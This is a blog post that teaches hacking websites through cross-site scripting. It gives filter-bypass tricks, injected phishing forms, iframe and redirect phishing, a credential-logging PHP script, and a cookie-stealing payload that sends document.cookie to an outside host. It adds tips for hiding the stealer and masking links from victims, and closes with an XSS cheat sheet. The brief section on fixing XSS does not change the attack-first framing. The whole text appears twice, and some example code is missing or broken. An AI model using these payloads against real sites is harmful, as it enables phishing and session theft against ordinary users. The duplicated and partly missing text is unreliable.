Today I will tell you how to hack a website using XSS
What exactly is XSS ?
XSS" is a short form for: "Cross Site Scripting" as you can see by the name , XSSdeals with scripting. To be more exact: Javascript. It's about injecting (almost) every Javascript (and html/css) command/script in a website.XSS flaws comes up every time a website doesn't filter the attackers input. In other words: the attacker can inject his malicious script into a website, and the browser just run's the code or script.
There are 3 types of XSS, I'm going to talk about the 2 most used:
$ Reflected XSS Attack:
$ When a attacker inject his malicious script into a searchquery, a searchbox,
$ or the end of an url, it's called Reflected XSS Attack. It's like throwing a ball
$ against a wall and receive him back.
$ tored XSS Attack:
$ Is when an injected XSS script is stored permanent on a website, for example in
$ a guestbook or bulletin board. Stored XSS hit's everyone who just reaches the
$ site with the malicious code.
$ DOM based XSS:
$ This is a rare used method, perhaps I'm going to write another Whitepaper about
$ DOM based XSS attack.
How to execute XSS commands
Actually, injecting a XSS script is very easy. To check if the target website is vulnerable, just look out for a searchbox or something.Let's say this is how a simple, unsecured search function looks like:
content of index.html
content of google.php
# I'm going to use this script as an example for the rest of this paper #
Let's say this script is stored on a webspace, when I type in:
123
then it leads me to the url:
http://site.ru/google.php?search=123
and shows me
123
But now, let's try to inject a simple javascript alert message :
and send it.
You can replace "turtles" with any other word you want, and even use ' ' instead
of " " for example:
But I'm keep using "turtles" as example for the rest of this paper.
The target website let's us know if it's vulnerable when it prints a popup containing
|=========| |======|
| turtles | or | 1234 |
|=========| |======|
Instead of the called code, we can even inject every simple html tags e.g.:
and send it.
Also, you can paste the code at the end of the url, and visit the site like:
or
# It's like the attacker is determining the content of the website. #
But even if this doesn't work, there's no reason to worry: that means the website
uses filter techniques to avoid XSS flaws. But there are also ways to
bypass those filters. How this works, you're going to read in the next chapter.
Bypass techniques
There are a lot of ways to bypass XSS filters on websites, I'll number some:
1.) magic_quotes_gpc=ON bypass
2.) HEX encoding
3.) Obfuscation
4.) Trying around
1.) magic_quotes_gpc=ON is a php setting (php.ini).
It causes that every ' (single-quote), " (double quote) and \ (backslash)
are escaped with a backslash automatically. It's also a well known method
to avoid XSS flaws, although it's exploitable.
How to bypass it when it's ON? - use the javascript function called
String.fromCharCode(), just convert your text in decimal characters
(e.g. here: http://www.asciizeichen.de/tabelle.html) and put them in the handling.
Using "turtles" (without quote sign) will look like this:
String.fromCharCode(116, 117, 114, 116, 108, 101, 115)
now insert this in your alert script:
2.) HEX encoding is a useful bypass method, too. Using this step will encode
your script, so you can't see clearly on the first look what the code will cause.
This is how
looks like encrypted in HEX:
3.) Obfuscation - sometimes website administrator simply put words like
"script","alert()","''" on the "badwords list", that means, when you
search for "script" on the website, it just shows you an error, like
"you are not allowed to search for this word" or something.
but this is a weak protection, you can bypass it using obfuscation.
your javascript code like:
There are like unlimited possibilities, but that leads us to the
next chapter...
4.) Trying around: sometimes you just got to try around, because every website
is secured/unsecured in a different, unique way. Some doesn't even use
cookies for example. Alway's keep a look at the website's source code!
Sometimes you need to adjust your XSS script, like:
This you need sometimes if you injected your code into a searchbox e.g. and
interrupt a html tag, so you first need to close him, then start a new
tag (<script>...).
Anyway, there are lot's of different methods how to bypass XSS filtration,
try around !
What can we do with XSS ?
Til now I showed you how to spawn a javascript alert message on a website.
But now I'll show you how harmful such a XSS flaw can be for your website. Here are
some attack techniques you can do with a XSS flaw:
1.) Inject a Phishing script
2.) Iframe Phishing
3.) Redirict Phishing
4.) Cookie stealing
1.) Phishing script inject: Just inject a 'user' and 'password' field in html
(With the <html> and <body> tags), that the victim may think he need's
to login to the target site.
Here an example:
www.site.ru/google.php?search=<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
<div style="text-align: center;"><form Method="POST" Action="http://www.phishingsite.ru/phishingscript.php">
Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br />
<input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
<br /></form></div></body></html>
content of phishingscript.php
<?php
login = $_POST['user'];
password = $_POST['Password'];
open = fopen('log.txt', 'a+');
fputs($open, 'Username : ' . $login . '<br >' . '
Password : ' . $password . '<br >' . '<br >');
?>
2.) Iframe Phishing: Simple thing, just inject a javascript code containing an
iframe where your phishing site is embeeded.
Obviously it needs to look just like the target site.
Here an example:
www.site.ru/google.php?search=<iframe src="http://www.yourphishingsite.ru" height="100%" width="100%"></iframe>
(Note: height="100%" width="100%" means that the whole window is filled with that iframe.)
The target site will spawn your phishing site in an Iframe, and the website user / victims won't see a
difference and log in (If they're are foolish enough).
3.) Rediriction Phishing: Also simple, just inject a javascript rediriction
script that leads to your phishingsite, of course it needs to look just
like the target site.
Here an example:
www.site.ru/google.php?search=<script>document.location.href="http://www.yourphishingsite.ru"</script>
or
www.site.ru/google.php?search=<META HTTP-EQUIV="refresh" CONTENT="0; URL="http://www.yorphishingsite.ru">
4.) Cookie stealing: One of the feared things in XSS flaws is the cookie stealing
attack. In this method you need to do following:
Place this cookiestealer.php in your hoster, and then inject a javascript
with your cookie stealer script embedded on your target website.
content of cookiestealer.php (found it somewhere with google)
<?php
cookie = $HTTP_GET_VARS["cookie"];
file = fopen('log.txt', 'a');
fwrite($file, $cookie . "nn");
fclose($file);
?>
Save it as cookiestealer.php and create a 'log.txt' and upload both files
on your own webspace, in the same directory and set "chmod 777".
Inject the following code in your target website:
http://www.site.ru/google.php?search=<script>location.href = 'http://phishingsite.ru/cookiestealer.php?cookie='+document.cookie;</script>
Then the victim's cookie (target's website user who visited the url above) should
appear in the log.txt.
Now you simply need to insert the cookie (with e.g. live http headers firefox addon)
and use it.
Obviously you need to replace
http://www.yourphishingsite.ru
With the url of your phishingsite.
# PROTIP: rename your 'cookiestealer.php' to something like 'turtles.php', #
# this looks less suspicous.
How to fix XSS leakages
XSS flaws can be very dangerous for your website, even though you can easily secure your own website using the following functions.
##########################################################
# #
# htmlspecialchars() #
# http://php.net/manual/de/function.htmlspecialchars.php #
# #
##########################################################
Example usage:
google.php:
<?php echo htmlspecialchars($_GET['search']); ?>
$ OR
##########################################################
# #
# htmlentities() #
# http://php.net/manual/de/function.htmlentities.php #
# #
##########################################################
Example usage:
google.php:
<?php echo htmlentities($_GET['search']); ?>
What happened? - the function simply replaced every specialchar to a harmless html char.
For example when I enter
<script>alert("Vishalsangwa");</script>
it appears
<script>alert(" Vishalsangwa ");</script>
But without any popup, because the <,>,',"
turned into <,>,',"
The attackers input has become a harmless, unexecutable html code.
Cheat Sheets
Here is the XSS cheat sheet, where I got most of them from http://ha.ckers.org/xss.html.
Enjoy.
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert(" Vishalsangwa says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
#############################################################
#
# PROTIP FOR EVERY XSS INJECTION:
# use url shortener services such as tinyurl.com or bit.ly
# to 'hide' your injection, so the victim won't know what's
# behind that url.
###############################################################
What exactly is XSS ?
XSS" is a short form for: "Cross Site Scripting" as you can see by the name , XSSdeals with scripting. To be more exact: Javascript. It's about injecting (almost) every Javascript (and html/css) command/script in a website.XSS flaws comes up every time a website doesn't filter the attackers input. In other words: the attacker can inject his malicious script into a website, and the browser just run's the code or script.
There are 3 types of XSS, I'm going to talk about the 2 most used:
$ Reflected XSS Attack:
$ When a attacker inject his malicious script into a searchquery, a searchbox,
$ or the end of an url, it's called Reflected XSS Attack. It's like throwing a ball
$ against a wall and receive him back.
$ tored XSS Attack:
$ Is when an injected XSS script is stored permanent on a website, for example in
$ a guestbook or bulletin board. Stored XSS hit's everyone who just reaches the
$ site with the malicious code.
$ DOM based XSS:
$ This is a rare used method, perhaps I'm going to write another Whitepaper about
$ DOM based XSS attack.
How to execute XSS commands
Actually, injecting a XSS script is very easy. To check if the target website is vulnerable, just look out for a searchbox or something.Let's say this is how a simple, unsecured search function looks like:
content of index.html
content of google.php
# I'm going to use this script as an example for the rest of this paper #
Let's say this script is stored on a webspace, when I type in:
123
then it leads me to the url:
http://site.ru/google.php?search=123
and shows me
123
But now, let's try to inject a simple javascript alert message :
and send it.
You can replace "turtles" with any other word you want, and even use ' ' instead
of " " for example:
But I'm keep using "turtles" as example for the rest of this paper.
The target website let's us know if it's vulnerable when it prints a popup containing
|=========| |======|
| turtles | or | 1234 |
|=========| |======|
Instead of the called code, we can even inject every simple html tags e.g.:
and send it.
Also, you can paste the code at the end of the url, and visit the site like:
or
# It's like the attacker is determining the content of the website. #
But even if this doesn't work, there's no reason to worry: that means the website
uses filter techniques to avoid XSS flaws. But there are also ways to
bypass those filters. How this works, you're going to read in the next chapter.
Bypass techniques
There are a lot of ways to bypass XSS filters on websites, I'll number some:
1.) magic_quotes_gpc=ON bypass
2.) HEX encoding
3.) Obfuscation
4.) Trying around
1.) magic_quotes_gpc=ON is a php setting (php.ini).
It causes that every ' (single-quote), " (double quote) and \ (backslash)
are escaped with a backslash automatically. It's also a well known method
to avoid XSS flaws, although it's exploitable.
How to bypass it when it's ON? - use the javascript function called
String.fromCharCode(), just convert your text in decimal characters
(e.g. here: http://www.asciizeichen.de/tabelle.html) and put them in the handling.
Using "turtles" (without quote sign) will look like this:
String.fromCharCode(116, 117, 114, 116, 108, 101, 115)
now insert this in your alert script:
2.) HEX encoding is a useful bypass method, too. Using this step will encode
your script, so you can't see clearly on the first look what the code will cause.
This is how
looks like encrypted in HEX:
3.) Obfuscation - sometimes website administrator simply put words like
"script","alert()","''" on the "badwords list", that means, when you
search for "script" on the website, it just shows you an error, like
"you are not allowed to search for this word" or something.
but this is a weak protection, you can bypass it using obfuscation.
your javascript code like:
There are like unlimited possibilities, but that leads us to the
next chapter...
4.) Trying around: sometimes you just got to try around, because every website
is secured/unsecured in a different, unique way. Some doesn't even use
cookies for example. Alway's keep a look at the website's source code!
Sometimes you need to adjust your XSS script, like:
This you need sometimes if you injected your code into a searchbox e.g. and
interrupt a html tag, so you first need to close him, then start a new
tag (<script>...).
Anyway, there are lot's of different methods how to bypass XSS filtration,
try around !
What can we do with XSS ?
Til now I showed you how to spawn a javascript alert message on a website.
But now I'll show you how harmful such a XSS flaw can be for your website. Here are
some attack techniques you can do with a XSS flaw:
1.) Inject a Phishing script
2.) Iframe Phishing
3.) Redirict Phishing
4.) Cookie stealing
1.) Phishing script inject: Just inject a 'user' and 'password' field in html
(With the <html> and <body> tags), that the victim may think he need's
to login to the target site.
Here an example:
www.site.ru/google.php?search=<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
<div style="text-align: center;"><form Method="POST" Action="http://www.phishingsite.ru/phishingscript.php">
Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br />
<input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
<br /></form></div></body></html>
content of phishingscript.php
<?php
login = $_POST['user'];
password = $_POST['Password'];
open = fopen('log.txt', 'a+');
fputs($open, 'Username : ' . $login . '<br >' . '
Password : ' . $password . '<br >' . '<br >');
?>
2.) Iframe Phishing: Simple thing, just inject a javascript code containing an
iframe where your phishing site is embeeded.
Obviously it needs to look just like the target site.
Here an example:
www.site.ru/google.php?search=<iframe src="http://www.yourphishingsite.ru" height="100%" width="100%"></iframe>
(Note: height="100%" width="100%" means that the whole window is filled with that iframe.)
The target site will spawn your phishing site in an Iframe, and the website user / victims won't see a
difference and log in (If they're are foolish enough).
3.) Rediriction Phishing: Also simple, just inject a javascript rediriction
script that leads to your phishingsite, of course it needs to look just
like the target site.
Here an example:
www.site.ru/google.php?search=<script>document.location.href="http://www.yourphishingsite.ru"</script>
or
www.site.ru/google.php?search=<META HTTP-EQUIV="refresh" CONTENT="0; URL="http://www.yorphishingsite.ru">
4.) Cookie stealing: One of the feared things in XSS flaws is the cookie stealing
attack. In this method you need to do following:
Place this cookiestealer.php in your hoster, and then inject a javascript
with your cookie stealer script embedded on your target website.
content of cookiestealer.php (found it somewhere with google)
<?php
cookie = $HTTP_GET_VARS["cookie"];
file = fopen('log.txt', 'a');
fwrite($file, $cookie . "nn");
fclose($file);
?>
Save it as cookiestealer.php and create a 'log.txt' and upload both files
on your own webspace, in the same directory and set "chmod 777".
Inject the following code in your target website:
http://www.site.ru/google.php?search=<script>location.href = 'http://phishingsite.ru/cookiestealer.php?cookie='+document.cookie;</script>
Then the victim's cookie (target's website user who visited the url above) should
appear in the log.txt.
Now you simply need to insert the cookie (with e.g. live http headers firefox addon)
and use it.
Obviously you need to replace
http://www.yourphishingsite.ru
With the url of your phishingsite.
# PROTIP: rename your 'cookiestealer.php' to something like 'turtles.php', #
# this looks less suspicous.
How to fix XSS leakages
XSS flaws can be very dangerous for your website, even though you can easily secure your own website using the following functions.
##########################################################
# #
# htmlspecialchars() #
# http://php.net/manual/de/function.htmlspecialchars.php #
# #
##########################################################
Example usage:
google.php:
<?php echo htmlspecialchars($_GET['search']); ?>
$ OR
##########################################################
# #
# htmlentities() #
# http://php.net/manual/de/function.htmlentities.php #
# #
##########################################################
Example usage:
google.php:
<?php echo htmlentities($_GET['search']); ?>
What happened? - the function simply replaced every specialchar to a harmless html char.
For example when I enter
<script>alert("Vishalsangwa");</script>
it appears
<script>alert(" Vishalsangwa ");</script>
But without any popup, because the <,>,',"
turned into <,>,',"
The attackers input has become a harmless, unexecutable html code.
Cheat Sheets
Here is the XSS cheat sheet, where I got most of them from http://ha.ckers.org/xss.html.
Enjoy.
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert(" Vishalsangwa says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
#############################################################
#
# PROTIP FOR EVERY XSS INJECTION:
# use url shortener services such as tinyurl.com or bit.ly
# to 'hide' your injection, so the victim won't know what's
# behind that url.
###############################################################
0 comments:
Post a Comment